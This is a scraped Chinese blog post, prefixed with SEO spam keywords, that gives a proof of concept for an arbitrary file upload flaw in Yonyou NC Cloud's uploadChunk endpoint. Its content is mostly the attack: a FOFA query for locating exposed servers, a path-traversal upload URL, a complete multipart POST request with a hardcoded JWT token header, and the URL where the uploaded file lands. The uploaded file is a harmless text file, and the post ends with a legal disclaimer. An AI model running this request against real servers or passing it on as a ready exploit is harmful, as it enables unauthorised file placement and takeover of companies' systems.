网站建设找酷风,了解网站建设,公司网站优化哪家好,一般卖机械行业的做哪些网站简介
NC Cloud是指用友公司推出的大型企业数字化平台。支持公有云、混合云、专属云的灵活部署模式。该产品uploadChunk文件存在任意文件上传漏洞。 漏洞复现
FOFA语法#xff1a;
app用友-NC-Cloud 访问页面如下所示#xff1a; POC#xff1a;/ncchr/pm/fb/…
简介
NC Cloud是指用友公司推出的大型企业数字化平台。支持公有云、混合云、专属云的灵活部署模式。该产品uploadChunk文件存在任意文件上传漏洞。 漏洞复现
FOFA语法
app用友-NC-Cloud 访问页面如下所示 POC/ncchr/pm/fb/attachment/uploadChunk?fileGuid/../../../nccloud/chunk1chunks1
POST请求数据包 accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ Content-Length: 149 Content-Type: multipart/form-data; boundarybd966ad8118cfcc67ee341272f2900c4 --bd966ad8118cfcc67ee341272f2900c4 Content-Disposition: form-data; namefile; filenametext.txt test123 --bd966ad8118cfcc67ee341272f2900c4-- 请求返回成功后访问
https://ip:port/nccloud/text.txt 免责声明
文章仅做经验分享用途切勿当真未授权的攻击属于非法行为利用本文章所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责作者不为此承担任何责任一旦造成后果请自行承担 结语
没有人规定一朵花一点要成长为向日葵或者玫瑰。
